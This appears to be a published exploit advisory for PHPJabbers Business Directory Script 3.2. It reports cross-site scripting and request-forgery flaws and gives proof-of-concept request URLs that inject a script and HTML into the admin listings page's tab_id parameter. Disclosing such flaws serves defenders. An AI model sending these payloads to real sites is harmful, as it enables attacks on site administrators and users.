Headline
PHPJabbers Business Directory Script 3.2 Cross Site Request Forgery / Cross Site Scripting
PHPJabbers Business Directory Script version 3.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
PHPJabbers Business Directory Script 3.2 Cross Site Request Forgery / Cross Site Scripting
# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities# Date: 09/08/2023# Exploit Author: Kerimcan Ozturk# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/business-directory-script/# Version: 3.2# Tested on: Windows 10 Pro## DescriptionTechnical Detail / POC==========================Login AccountGo to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57)[1] Cross-Site Scripting (XSS)Request:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><image/src/onerror=prompt(8)>[2] Cross-Site Request ForgeryRequest:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><font%20color="green">Kerimcan%20Ozturk</font>Best Regards